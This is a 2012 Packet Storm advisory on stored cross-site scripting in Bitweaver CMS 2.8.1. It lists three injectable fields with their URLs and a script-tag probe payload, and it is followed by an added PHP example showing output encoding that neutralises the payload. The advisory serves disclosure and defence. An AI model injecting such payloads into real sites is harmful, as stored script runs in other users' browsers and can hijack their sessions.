Bitweaver CMS 2.8.1 Cross Site Scripting

2012-06-22T00:00:00
ID PACKETSTORM:114041
Type packetstorm
Reporter $1l3n7 @$$@$$17
Modified 2012-06-22T00:00:00

Description

                                        
`
TITLE: Bitweaver CMS Multiple stored XSS  
Vendor: Bitweaver CMS  
Author: $1l3n7 @$$@$$17  
Email: sil3ntb0t@gmail.com  
Download Link:  
https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download  
  
Versions: 2.8.1  
Tested on: Windows 7  
  
------------------------------------------------------------------------------  
Description: Bitweaver is an application framework for content  
management. It is a fully functional web application and CMS. It is  
truly open source, community driven, object oriented, and written in  
PHP. It uses Smarty Templates and ADOdb to support many databases,  
including Postgres, Firebird, Oracle, and MySQL.  
  
A) Persistent XSS  
  
DEMO:  
  
http://localhost/bitweaver/articles/index.php  
  
http://localhost/bitweaver/articles/edit.php  
  
  
1: In Author Name Field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
2:  
http://localhost/bitweaver/pigeonholes/edit_pigeonholes.php?action=create  
  
In title field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
3:  
  
http://localhost/bitweaver/events/edit.php  
  
In title field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
  
  
  
----------------------------------------------------------------------------  
  
gr33t1ngs and ShOuTZ to r007k17-w and all my friends..  
`
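
The three fields listed above (article author name, pigeonhole title, event title) store the probe string and return it unencoded. The following is an added example, not Bitweaver source and not part of the original advisory: it renders that same stored value into the output contexts the string is built to break out of, first echoed as stored and then passed through `htmlspecialchars()`. The function names `h`, `render` and `is_injected` are hypothetical.

```php
<?php
// Added illustration, not Bitweaver source. All function names are hypothetical.

// The probe string from the advisory, as it would sit in a stored field
// (article author name, pigeonhole title, event title).
$stored = "\"'-->><script>alert(0)</script>";

// Encode for HTML element content and quoted attribute values.
// ENT_QUOTES covers both " and ', so the value cannot close either quote style.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The output contexts the probe targets: ", ' and --> each close one of them.
function render(string $value, callable $enc): array
{
    $v = $enc($value);
    return [
        'element body'  => "<td>$v</td>",
        'double-quoted' => "<input name=\"title\" value=\"$v\">",
        'single-quoted' => "<input name='title' value='$v'>",
        'html comment'  => "<!-- author: $v -->",
    ];
}

// True when the rendered fragment still carries live markup from the stored value.
function is_injected(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$raw = fn(string $s): string => $s;   // the "before": value echoed as stored

foreach (['raw' => $raw, 'encoded' => 'h'] as $label => $enc) {
    foreach (render($stored, $enc) as $context => $html) {
        printf("%-8s %-14s %-9s %s\n", $label, $context,
            is_injected($html) ? 'INJECTED' : 'inert', $html);
    }
}
```

In a Smarty template the same encoding is applied at output time with the `escape` modifier, for example `{$title|escape:'html'}`.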